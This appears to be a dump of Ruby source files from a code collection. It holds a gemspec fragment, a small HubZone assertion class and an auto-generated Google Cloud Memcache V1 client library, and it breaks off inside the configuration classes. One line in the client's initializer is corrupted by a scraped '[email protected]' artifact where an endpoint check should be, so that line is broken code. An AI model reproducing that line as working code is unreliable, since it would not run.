spec.add_development_dependency "bundler", "~> 1.5"
spec.add_development_dependency "rake"
spec.add_runtime_dependency "rest-client", "~> 1.6.7"
end
| 35.04 | 81 | 0.665525 |
1cac3df190d05f83885468ed5ead13a3568d24f4 | 226 | # Allows for assertion of a location against the qct_qda HubZone layer
class QctQdaAssertion
extend AssertionHelper
class << self
def assertion(location)
assertion_by_type('qct_qda', location)
end
end
end
| 20.545455 | 70 | 0.747788 |
ed06c5efc526ee8810045f2f01d93e2dcf687780 | 47,701 | # frozen_string_literal: true
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Auto-generated by gapic-generator-ruby. DO NOT EDIT!
require "google/cloud/errors"
require "google/cloud/memcache/v1/cloud_memcache_pb"
module Google
module Cloud
module Memcache
module V1
module CloudMemcache
##
# Client for the CloudMemcache service.
#
# Configures and manages Cloud Memorystore for Memcached instances.
#
#
# The `memcache.googleapis.com` service implements the Google Cloud Memorystore
# for Memcached API and defines the following resource model for managing
# Memorystore Memcached (also called Memcached below) instances:
# * The service works with a collection of cloud projects, named: `/projects/*`
# * Each project has a collection of available locations, named: `/locations/*`
# * Each location has a collection of Memcached instances, named:
# `/instances/*`
# * As such, Memcached instances are resources of the form:
# `/projects/{project_id}/locations/{location_id}/instances/{instance_id}`
#
# Note that location_id must be a GCP `region`; for example:
# * `projects/my-memcached-project/locations/us-central1/instances/my-memcached`
#
class Client
include Paths
# @private
attr_reader :cloud_memcache_stub
##
# Configure the CloudMemcache Client class.
#
# See {::Google::Cloud::Memcache::V1::CloudMemcache::Client::Configuration}
# for a description of the configuration fields.
#
# ## Example
#
# To modify the configuration for all CloudMemcache clients:
#
# ::Google::Cloud::Memcache::V1::CloudMemcache::Client.configure do |config|
# config.timeout = 10.0
# end
#
# @yield [config] Configure the Client client.
# @yieldparam config [Client::Configuration]
#
# @return [Client::Configuration]
#
def self.configure
@configure ||= begin
namespace = ["Google", "Cloud", "Memcache", "V1"]
parent_config = while namespace.any?
parent_name = namespace.join "::"
parent_const = const_get parent_name
break parent_const.configure if parent_const.respond_to? :configure
namespace.pop
end
default_config = Client::Configuration.new parent_config
default_config.rpcs.list_instances.timeout = 1200.0
default_config.rpcs.get_instance.timeout = 1200.0
default_config.rpcs.create_instance.timeout = 1200.0
default_config.rpcs.update_instance.timeout = 1200.0
default_config.rpcs.update_parameters.timeout = 1200.0
default_config.rpcs.delete_instance.timeout = 1200.0
default_config.rpcs.apply_parameters.timeout = 1200.0
default_config
end
yield @configure if block_given?
@configure
end
##
# Configure the CloudMemcache Client instance.
#
# The configuration is set to the derived mode, meaning that values can be changed,
# but structural changes (adding new fields, etc.) are not allowed. Structural changes
# should be made on {Client.configure}.
#
# See {::Google::Cloud::Memcache::V1::CloudMemcache::Client::Configuration}
# for a description of the configuration fields.
#
# @yield [config] Configure the Client client.
# @yieldparam config [Client::Configuration]
#
# @return [Client::Configuration]
#
def configure
yield @config if block_given?
@config
end
##
# Create a new CloudMemcache client object.
#
# ## Examples
#
# To create a new CloudMemcache client with the default
# configuration:
#
# client = ::Google::Cloud::Memcache::V1::CloudMemcache::Client.new
#
# To create a new CloudMemcache client with a custom
# configuration:
#
# client = ::Google::Cloud::Memcache::V1::CloudMemcache::Client.new do |config|
# config.timeout = 10.0
# end
#
# @yield [config] Configure the CloudMemcache client.
# @yieldparam config [Client::Configuration]
#
def initialize
# These require statements are intentionally placed here to initialize
# the gRPC module only when it's required.
# See https://github.com/googleapis/toolkit/issues/446
require "gapic/grpc"
require "google/cloud/memcache/v1/cloud_memcache_services_pb"
# Create the configuration object
@config = Configuration.new Client.configure
# Yield the configuration if needed
yield @config if block_given?
# Create credentials
credentials = @config.credentials
# Use self-signed JWT if the scope and endpoint are unchanged from default,
# but only if the default endpoint does not have a region prefix.
enable_self_signed_jwt = @config.scope == Client.configure.scope &&
@config.endpoint == Client.configure.endpoint &&
[email protected](".").first.include?("-")
credentials ||= Credentials.default scope: @config.scope,
enable_self_signed_jwt: enable_self_signed_jwt
if credentials.is_a?(::String) || credentials.is_a?(::Hash)
credentials = Credentials.new credentials, scope: @config.scope
end
@quota_project_id = @config.quota_project
@quota_project_id ||= credentials.quota_project_id if credentials.respond_to? :quota_project_id
@operations_client = Operations.new do |config|
config.credentials = credentials
config.endpoint = @config.endpoint
end
@cloud_memcache_stub = ::Gapic::ServiceStub.new(
::Google::Cloud::Memcache::V1::CloudMemcache::Stub,
credentials: credentials,
endpoint: @config.endpoint,
channel_args: @config.channel_args,
interceptors: @config.interceptors
)
end
##
# Get the associated client for long-running operations.
#
# @return [::Google::Cloud::Memcache::V1::CloudMemcache::Operations]
#
attr_reader :operations_client
# Service calls
##
# Lists Instances in a given location.
#
# @overload list_instances(request, options = nil)
# Pass arguments to `list_instances` via a request object, either of type
# {::Google::Cloud::Memcache::V1::ListInstancesRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Memcache::V1::ListInstancesRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries, etc. Optional.
#
# @overload list_instances(parent: nil, page_size: nil, page_token: nil, filter: nil, order_by: nil)
# Pass arguments to `list_instances` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param parent [::String]
# Required. The resource name of the instance location using the form:
# `projects/{project_id}/locations/{location_id}`
# where `location_id` refers to a GCP region
# @param page_size [::Integer]
# The maximum number of items to return.
#
# If not specified, a default value of 1000 will be used by the service.
# Regardless of the page_size value, the response may include a partial list
# and a caller should only rely on response's
# [next_page_token][CloudMemcache.ListInstancesResponse.next_page_token]
# to determine if there are more instances left to be queried.
# @param page_token [::String]
# The next_page_token value returned from a previous List request,
# if any.
# @param filter [::String]
# List filter. For example, exclude all Memcached instances with name as
# my-instance by specifying "name != my-instance".
# @param order_by [::String]
# Sort results. Supported values are "name", "name desc" or "" (unsorted).
#
# @yield [response, operation] Access the result along with the RPC operation
# @yieldparam response [::Gapic::PagedEnumerable<::Google::Cloud::Memcache::V1::Instance>]
# @yieldparam operation [::GRPC::ActiveCall::Operation]
#
# @return [::Gapic::PagedEnumerable<::Google::Cloud::Memcache::V1::Instance>]
#
# @raise [::Google::Cloud::Error] if the RPC is aborted.
#
def list_instances request, options = nil
  raise ::ArgumentError, "request must be provided" if request.nil?

  request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Memcache::V1::ListInstancesRequest

  # A Hash (or nil) is accepted in place of a CallOptions object.
  options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h

  # Seed call metadata from the per-RPC configuration for this method.
  rpc_config = @config.rpcs.list_instances
  metadata = rpc_config.metadata.to_h

  # Attach the x-goog-api-client and x-goog-user-project headers.
  metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
    lib_name: @config.lib_name, lib_version: @config.lib_version,
    gapic_version: ::Google::Cloud::Memcache::V1::VERSION
  metadata[:"x-goog-user-project"] = @quota_project_id if @quota_project_id

  # Routing header derived from the request's parent resource name.
  metadata[:"x-goog-request-params"] ||=
    { "parent" => request.parent }.map { |key, value| "#{key}=#{value}" }.join("&")

  options.apply_defaults timeout: rpc_config.timeout,
                         metadata: metadata,
                         retry_policy: rpc_config.retry_policy
  options.apply_defaults metadata: @config.metadata,
                         retry_policy: @config.retry_policy

  @cloud_memcache_stub.call_rpc :list_instances, request, options: options do |response, operation|
    # Wrap the raw page response so callers can enumerate across pages.
    response = ::Gapic::PagedEnumerable.new @cloud_memcache_stub, :list_instances, request, response, operation, options
    yield response, operation if block_given?
    return response
  end
rescue ::GRPC::BadStatus => e
  raise ::Google::Cloud::Error.from_error(e)
end
##
# Gets details of a single Instance.
#
# @overload get_instance(request, options = nil)
# Pass arguments to `get_instance` via a request object, either of type
# {::Google::Cloud::Memcache::V1::GetInstanceRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Memcache::V1::GetInstanceRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries, etc. Optional.
#
# @overload get_instance(name: nil)
# Pass arguments to `get_instance` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param name [::String]
# Required. Memcached instance resource name in the format:
# `projects/{project_id}/locations/{location_id}/instances/{instance_id}`
# where `location_id` refers to a GCP region
#
# @yield [response, operation] Access the result along with the RPC operation
# @yieldparam response [::Google::Cloud::Memcache::V1::Instance]
# @yieldparam operation [::GRPC::ActiveCall::Operation]
#
# @return [::Google::Cloud::Memcache::V1::Instance]
#
# @raise [::Google::Cloud::Error] if the RPC is aborted.
#
def get_instance request, options = nil
  raise ::ArgumentError, "request must be provided" if request.nil?

  request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Memcache::V1::GetInstanceRequest

  # A Hash (or nil) is accepted in place of a CallOptions object.
  options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h

  # Seed call metadata from the per-RPC configuration for this method.
  rpc_config = @config.rpcs.get_instance
  metadata = rpc_config.metadata.to_h

  # Attach the x-goog-api-client and x-goog-user-project headers.
  metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
    lib_name: @config.lib_name, lib_version: @config.lib_version,
    gapic_version: ::Google::Cloud::Memcache::V1::VERSION
  metadata[:"x-goog-user-project"] = @quota_project_id if @quota_project_id

  # Routing header derived from the instance resource name.
  metadata[:"x-goog-request-params"] ||=
    { "name" => request.name }.map { |key, value| "#{key}=#{value}" }.join("&")

  options.apply_defaults timeout: rpc_config.timeout,
                         metadata: metadata,
                         retry_policy: rpc_config.retry_policy
  options.apply_defaults metadata: @config.metadata,
                         retry_policy: @config.retry_policy

  @cloud_memcache_stub.call_rpc :get_instance, request, options: options do |response, operation|
    yield response, operation if block_given?
    return response
  end
rescue ::GRPC::BadStatus => e
  raise ::Google::Cloud::Error.from_error(e)
end
##
# Creates a new Instance in a given location.
#
# @overload create_instance(request, options = nil)
# Pass arguments to `create_instance` via a request object, either of type
# {::Google::Cloud::Memcache::V1::CreateInstanceRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Memcache::V1::CreateInstanceRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries, etc. Optional.
#
# @overload create_instance(parent: nil, instance_id: nil, instance: nil)
# Pass arguments to `create_instance` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param parent [::String]
# Required. The resource name of the instance location using the form:
# `projects/{project_id}/locations/{location_id}`
# where `location_id` refers to a GCP region
# @param instance_id [::String]
# Required. The logical name of the Memcached instance in the user
# project with the following restrictions:
#
# * Must contain only lowercase letters, numbers, and hyphens.
# * Must start with a letter.
# * Must be between 1-40 characters.
# * Must end with a number or a letter.
# * Must be unique within the user project / location
#
# If any of the above are not met, will raise an invalid argument error.
# @param instance [::Google::Cloud::Memcache::V1::Instance, ::Hash]
# Required. A Memcached Instance
#
# @yield [response, operation] Access the result along with the RPC operation
# @yieldparam response [::Gapic::Operation]
# @yieldparam operation [::GRPC::ActiveCall::Operation]
#
# @return [::Gapic::Operation]
#
# @raise [::Google::Cloud::Error] if the RPC is aborted.
#
def create_instance request, options = nil
  raise ::ArgumentError, "request must be provided" if request.nil?

  request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Memcache::V1::CreateInstanceRequest

  # A Hash (or nil) is accepted in place of a CallOptions object.
  options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h

  # Seed call metadata from the per-RPC configuration for this method.
  rpc_config = @config.rpcs.create_instance
  metadata = rpc_config.metadata.to_h

  # Attach the x-goog-api-client and x-goog-user-project headers.
  metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
    lib_name: @config.lib_name, lib_version: @config.lib_version,
    gapic_version: ::Google::Cloud::Memcache::V1::VERSION
  metadata[:"x-goog-user-project"] = @quota_project_id if @quota_project_id

  # Routing header derived from the request's parent resource name.
  metadata[:"x-goog-request-params"] ||=
    { "parent" => request.parent }.map { |key, value| "#{key}=#{value}" }.join("&")

  options.apply_defaults timeout: rpc_config.timeout,
                         metadata: metadata,
                         retry_policy: rpc_config.retry_policy
  options.apply_defaults metadata: @config.metadata,
                         retry_policy: @config.retry_policy

  @cloud_memcache_stub.call_rpc :create_instance, request, options: options do |response, operation|
    # Wrap the raw long-running operation so callers can poll/await it.
    response = ::Gapic::Operation.new response, @operations_client, options: options
    yield response, operation if block_given?
    return response
  end
rescue ::GRPC::BadStatus => e
  raise ::Google::Cloud::Error.from_error(e)
end
##
# Updates an existing Instance in a given project and location.
#
# @overload update_instance(request, options = nil)
# Pass arguments to `update_instance` via a request object, either of type
# {::Google::Cloud::Memcache::V1::UpdateInstanceRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Memcache::V1::UpdateInstanceRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries, etc. Optional.
#
# @overload update_instance(update_mask: nil, instance: nil)
# Pass arguments to `update_instance` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param update_mask [::Google::Protobuf::FieldMask, ::Hash]
# Required. Mask of fields to update.
# * `displayName`
# @param instance [::Google::Cloud::Memcache::V1::Instance, ::Hash]
# Required. A Memcached Instance.
# Only fields specified in update_mask are updated.
#
# @yield [response, operation] Access the result along with the RPC operation
# @yieldparam response [::Gapic::Operation]
# @yieldparam operation [::GRPC::ActiveCall::Operation]
#
# @return [::Gapic::Operation]
#
# @raise [::Google::Cloud::Error] if the RPC is aborted.
#
def update_instance request, options = nil
  raise ::ArgumentError, "request must be provided" if request.nil?

  request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Memcache::V1::UpdateInstanceRequest

  # A Hash (or nil) is accepted in place of a CallOptions object.
  options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h

  # Seed call metadata from the per-RPC configuration for this method.
  rpc_config = @config.rpcs.update_instance
  metadata = rpc_config.metadata.to_h

  # Attach the x-goog-api-client and x-goog-user-project headers.
  metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
    lib_name: @config.lib_name, lib_version: @config.lib_version,
    gapic_version: ::Google::Cloud::Memcache::V1::VERSION
  metadata[:"x-goog-user-project"] = @quota_project_id if @quota_project_id

  # Routing header derived from the nested instance resource name.
  metadata[:"x-goog-request-params"] ||=
    { "instance.name" => request.instance.name }.map { |key, value| "#{key}=#{value}" }.join("&")

  options.apply_defaults timeout: rpc_config.timeout,
                         metadata: metadata,
                         retry_policy: rpc_config.retry_policy
  options.apply_defaults metadata: @config.metadata,
                         retry_policy: @config.retry_policy

  @cloud_memcache_stub.call_rpc :update_instance, request, options: options do |response, operation|
    # Wrap the raw long-running operation so callers can poll/await it.
    response = ::Gapic::Operation.new response, @operations_client, options: options
    yield response, operation if block_given?
    return response
  end
rescue ::GRPC::BadStatus => e
  raise ::Google::Cloud::Error.from_error(e)
end
##
# Updates the defined Memcached Parameters for an existing Instance.
# This method only stages the parameters, it must be followed by
# ApplyParameters to apply the parameters to nodes of the Memcached Instance.
#
# @overload update_parameters(request, options = nil)
# Pass arguments to `update_parameters` via a request object, either of type
# {::Google::Cloud::Memcache::V1::UpdateParametersRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Memcache::V1::UpdateParametersRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries, etc. Optional.
#
# @overload update_parameters(name: nil, update_mask: nil, parameters: nil)
# Pass arguments to `update_parameters` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param name [::String]
# Required. Resource name of the Memcached instance for which the parameters should be
# updated.
# @param update_mask [::Google::Protobuf::FieldMask, ::Hash]
# Required. Mask of fields to update.
# @param parameters [::Google::Cloud::Memcache::V1::MemcacheParameters, ::Hash]
# The parameters to apply to the instance.
#
# @yield [response, operation] Access the result along with the RPC operation
# @yieldparam response [::Gapic::Operation]
# @yieldparam operation [::GRPC::ActiveCall::Operation]
#
# @return [::Gapic::Operation]
#
# @raise [::Google::Cloud::Error] if the RPC is aborted.
#
def update_parameters request, options = nil
  raise ::ArgumentError, "request must be provided" if request.nil?

  request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Memcache::V1::UpdateParametersRequest

  # A Hash (or nil) is accepted in place of a CallOptions object.
  options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h

  # Seed call metadata from the per-RPC configuration for this method.
  rpc_config = @config.rpcs.update_parameters
  metadata = rpc_config.metadata.to_h

  # Attach the x-goog-api-client and x-goog-user-project headers.
  metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
    lib_name: @config.lib_name, lib_version: @config.lib_version,
    gapic_version: ::Google::Cloud::Memcache::V1::VERSION
  metadata[:"x-goog-user-project"] = @quota_project_id if @quota_project_id

  # Routing header derived from the instance resource name.
  metadata[:"x-goog-request-params"] ||=
    { "name" => request.name }.map { |key, value| "#{key}=#{value}" }.join("&")

  options.apply_defaults timeout: rpc_config.timeout,
                         metadata: metadata,
                         retry_policy: rpc_config.retry_policy
  options.apply_defaults metadata: @config.metadata,
                         retry_policy: @config.retry_policy

  @cloud_memcache_stub.call_rpc :update_parameters, request, options: options do |response, operation|
    # Wrap the raw long-running operation so callers can poll/await it.
    response = ::Gapic::Operation.new response, @operations_client, options: options
    yield response, operation if block_given?
    return response
  end
rescue ::GRPC::BadStatus => e
  raise ::Google::Cloud::Error.from_error(e)
end
##
# Deletes a single Instance.
#
# @overload delete_instance(request, options = nil)
# Pass arguments to `delete_instance` via a request object, either of type
# {::Google::Cloud::Memcache::V1::DeleteInstanceRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Memcache::V1::DeleteInstanceRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries, etc. Optional.
#
# @overload delete_instance(name: nil)
# Pass arguments to `delete_instance` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param name [::String]
# Required. Memcached instance resource name in the format:
# `projects/{project_id}/locations/{location_id}/instances/{instance_id}`
# where `location_id` refers to a GCP region
#
# @yield [response, operation] Access the result along with the RPC operation
# @yieldparam response [::Gapic::Operation]
# @yieldparam operation [::GRPC::ActiveCall::Operation]
#
# @return [::Gapic::Operation]
#
# @raise [::Google::Cloud::Error] if the RPC is aborted.
#
def delete_instance request, options = nil
  raise ::ArgumentError, "request must be provided" if request.nil?

  request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Memcache::V1::DeleteInstanceRequest

  # A Hash (or nil) is accepted in place of a CallOptions object.
  options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h

  # Seed call metadata from the per-RPC configuration for this method.
  rpc_config = @config.rpcs.delete_instance
  metadata = rpc_config.metadata.to_h

  # Attach the x-goog-api-client and x-goog-user-project headers.
  metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
    lib_name: @config.lib_name, lib_version: @config.lib_version,
    gapic_version: ::Google::Cloud::Memcache::V1::VERSION
  metadata[:"x-goog-user-project"] = @quota_project_id if @quota_project_id

  # Routing header derived from the instance resource name.
  metadata[:"x-goog-request-params"] ||=
    { "name" => request.name }.map { |key, value| "#{key}=#{value}" }.join("&")

  options.apply_defaults timeout: rpc_config.timeout,
                         metadata: metadata,
                         retry_policy: rpc_config.retry_policy
  options.apply_defaults metadata: @config.metadata,
                         retry_policy: @config.retry_policy

  @cloud_memcache_stub.call_rpc :delete_instance, request, options: options do |response, operation|
    # Wrap the raw long-running operation so callers can poll/await it.
    response = ::Gapic::Operation.new response, @operations_client, options: options
    yield response, operation if block_given?
    return response
  end
rescue ::GRPC::BadStatus => e
  raise ::Google::Cloud::Error.from_error(e)
end
##
# ApplyParameters will restart the set of specified nodes in order to update
# them to the current set of parameters for the Memcached Instance.
#
# @overload apply_parameters(request, options = nil)
# Pass arguments to `apply_parameters` via a request object, either of type
# {::Google::Cloud::Memcache::V1::ApplyParametersRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Memcache::V1::ApplyParametersRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries, etc. Optional.
#
# @overload apply_parameters(name: nil, node_ids: nil, apply_all: nil)
# Pass arguments to `apply_parameters` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param name [::String]
# Required. Resource name of the Memcached instance for which parameter group updates
# should be applied.
# @param node_ids [::Array<::String>]
# Nodes to which we should apply the instance-level parameter group.
# @param apply_all [::Boolean]
# Whether to apply instance-level parameter group to all nodes. If set to
# true, will explicitly restrict users from specifying any nodes, and apply
# parameter group updates to all nodes within the instance.
#
# @yield [response, operation] Access the result along with the RPC operation
# @yieldparam response [::Gapic::Operation]
# @yieldparam operation [::GRPC::ActiveCall::Operation]
#
# @return [::Gapic::Operation]
#
# @raise [::Google::Cloud::Error] if the RPC is aborted.
#
def apply_parameters request, options = nil
  raise ::ArgumentError, "request must be provided" if request.nil?

  request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Memcache::V1::ApplyParametersRequest

  # A Hash (or nil) is accepted in place of a CallOptions object.
  options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h

  # Seed call metadata from the per-RPC configuration for this method.
  rpc_config = @config.rpcs.apply_parameters
  metadata = rpc_config.metadata.to_h

  # Attach the x-goog-api-client and x-goog-user-project headers.
  metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
    lib_name: @config.lib_name, lib_version: @config.lib_version,
    gapic_version: ::Google::Cloud::Memcache::V1::VERSION
  metadata[:"x-goog-user-project"] = @quota_project_id if @quota_project_id

  # Routing header derived from the instance resource name.
  metadata[:"x-goog-request-params"] ||=
    { "name" => request.name }.map { |key, value| "#{key}=#{value}" }.join("&")

  options.apply_defaults timeout: rpc_config.timeout,
                         metadata: metadata,
                         retry_policy: rpc_config.retry_policy
  options.apply_defaults metadata: @config.metadata,
                         retry_policy: @config.retry_policy

  @cloud_memcache_stub.call_rpc :apply_parameters, request, options: options do |response, operation|
    # Wrap the raw long-running operation so callers can poll/await it.
    response = ::Gapic::Operation.new response, @operations_client, options: options
    yield response, operation if block_given?
    return response
  end
rescue ::GRPC::BadStatus => e
  raise ::Google::Cloud::Error.from_error(e)
end
##
# Configuration class for the CloudMemcache API.
#
# This class represents the configuration for CloudMemcache,
# providing control over timeouts, retry behavior, logging, transport
# parameters, and other low-level controls. Certain parameters can also be
# applied individually to specific RPCs. See
# {::Google::Cloud::Memcache::V1::CloudMemcache::Client::Configuration::Rpcs}
# for a list of RPCs that can be configured independently.
#
# Configuration can be applied globally to all clients, or to a single client
# on construction.
#
# # Examples
#
# To modify the global config, setting the timeout for list_instances
# to 20 seconds, and all remaining timeouts to 10 seconds:
#
# ::Google::Cloud::Memcache::V1::CloudMemcache::Client.configure do |config|
# config.timeout = 10.0
# config.rpcs.list_instances.timeout = 20.0
# end
#
# To apply the above configuration only to a new client:
#
# client = ::Google::Cloud::Memcache::V1::CloudMemcache::Client.new do |config|
# config.timeout = 10.0
# config.rpcs.list_instances.timeout = 20.0
# end
#
# @!attribute [rw] endpoint
# The hostname or hostname:port of the service endpoint.
# Defaults to `"memcache.googleapis.com"`.
# @return [::String]
# @!attribute [rw] credentials
# Credentials to send with calls. You may provide any of the following types:
# * (`String`) The path to a service account key file in JSON format
# * (`Hash`) A service account key as a Hash
# * (`Google::Auth::Credentials`) A googleauth credentials object
# (see the [googleauth docs](https://googleapis.dev/ruby/googleauth/latest/index.html))
# * (`Signet::OAuth2::Client`) A signet oauth2 client object
# (see the [signet docs](https://googleapis.dev/ruby/signet/latest/Signet/OAuth2/Client.html))
# * (`GRPC::Core::Channel`) a gRPC channel with included credentials
# * (`GRPC::Core::ChannelCredentials`) a gRPC credentails object
# * (`nil`) indicating no credentials
# @return [::Object]
# @!attribute [rw] scope
# The OAuth scopes
# @return [::Array<::String>]
# @!attribute [rw] lib_name
# The library name as recorded in instrumentation and logging
# @return [::String]
# @!attribute [rw] lib_version
# The library version as recorded in instrumentation and logging
# @return [::String]
# @!attribute [rw] channel_args
# Extra parameters passed to the gRPC channel. Note: this is ignored if a
# `GRPC::Core::Channel` object is provided as the credential.
# @return [::Hash]
# @!attribute [rw] interceptors
# An array of interceptors that are run before calls are executed.
# @return [::Array<::GRPC::ClientInterceptor>]
# @!attribute [rw] timeout
# The call timeout in seconds.
# @return [::Numeric]
# @!attribute [rw] metadata
# Additional gRPC headers to be sent with the call.
# @return [::Hash{::Symbol=>::String}]
# @!attribute [rw] retry_policy
# The retry policy. The value is a hash with the following keys:
# * `:initial_delay` (*type:* `Numeric`) - The initial delay in seconds.
# * `:max_delay` (*type:* `Numeric`) - The max delay in seconds.
# * `:multiplier` (*type:* `Numeric`) - The incremental backoff multiplier.
# * `:retry_codes` (*type:* `Array<String>`) - The error codes that should
# trigger a retry.
# @return [::Hash]
# @!attribute [rw] quota_project
# A separate project against which to charge quota.
# @return [::String]
#
# Client-level configuration object (see the attribute docs above). Unset
# values fall back to a parent configuration, chaining up to the global
# defaults.
class Configuration
  extend ::Gapic::Config

  config_attr :endpoint, "memcache.googleapis.com", ::String
  # Credentials accept several representations; the block validates any
  # assigned value. gRPC channel types are only permitted when the grpc
  # library has been loaded.
  config_attr :credentials, nil do |value|
    allowed = [::String, ::Hash, ::Proc, ::Symbol, ::Google::Auth::Credentials, ::Signet::OAuth2::Client, nil]
    allowed += [::GRPC::Core::Channel, ::GRPC::Core::ChannelCredentials] if defined? ::GRPC
    allowed.any? { |klass| klass === value }
  end
  config_attr :scope, nil, ::String, ::Array, nil
  config_attr :lib_name, nil, ::String, nil
  config_attr :lib_version, nil, ::String, nil
  # Disables gRPC's service-config resolution by default.
  config_attr(:channel_args, { "grpc.service_config_disable_resolution" => 1 }, ::Hash, nil)
  config_attr :interceptors, nil, ::Array, nil
  config_attr :timeout, nil, ::Numeric, nil
  config_attr :metadata, nil, ::Hash, nil
  config_attr :retry_policy, nil, ::Hash, ::Proc, nil
  config_attr :quota_project, nil, ::String, nil

  # @private
  # Records the parent configuration (when given) so unset attributes
  # inherit its values; yields self for block-style configuration.
  def initialize parent_config = nil
    @parent_config = parent_config unless parent_config.nil?
    yield self if block_given?
  end

  ##
  # Configurations for individual RPCs
  # @return [Rpcs]
  #
  def rpcs
    # Built lazily; chains to the parent configuration's rpcs when present.
    @rpcs ||= begin
      parent_rpcs = nil
      parent_rpcs = @parent_config.rpcs if defined?(@parent_config) && @parent_config.respond_to?(:rpcs)
      Rpcs.new parent_rpcs
    end
  end

  ##
  # Configuration RPC class for the CloudMemcache API.
  #
  # Includes fields providing the configuration for each RPC in this service.
  # Each configuration object is of type `Gapic::Config::Method` and includes
  # the following configuration fields:
  #
  # * `timeout` (*type:* `Numeric`) - The call timeout in seconds
  # * `metadata` (*type:* `Hash{Symbol=>String}`) - Additional gRPC headers
  # * `retry_policy (*type:* `Hash`) - The retry policy. The policy fields
  # include the following keys:
  # * `:initial_delay` (*type:* `Numeric`) - The initial delay in seconds.
  # * `:max_delay` (*type:* `Numeric`) - The max delay in seconds.
  # * `:multiplier` (*type:* `Numeric`) - The incremental backoff multiplier.
  # * `:retry_codes` (*type:* `Array<String>`) - The error codes that should
  # trigger a retry.
  #
  class Rpcs
    ##
    # RPC-specific configuration for `list_instances`
    # @return [::Gapic::Config::Method]
    #
    attr_reader :list_instances
    ##
    # RPC-specific configuration for `get_instance`
    # @return [::Gapic::Config::Method]
    #
    attr_reader :get_instance
    ##
    # RPC-specific configuration for `create_instance`
    # @return [::Gapic::Config::Method]
    #
    attr_reader :create_instance
    ##
    # RPC-specific configuration for `update_instance`
    # @return [::Gapic::Config::Method]
    #
    attr_reader :update_instance
    ##
    # RPC-specific configuration for `update_parameters`
    # @return [::Gapic::Config::Method]
    #
    attr_reader :update_parameters
    ##
    # RPC-specific configuration for `delete_instance`
    # @return [::Gapic::Config::Method]
    #
    attr_reader :delete_instance
    ##
    # RPC-specific configuration for `apply_parameters`
    # @return [::Gapic::Config::Method]
    #
    attr_reader :apply_parameters

    # @private
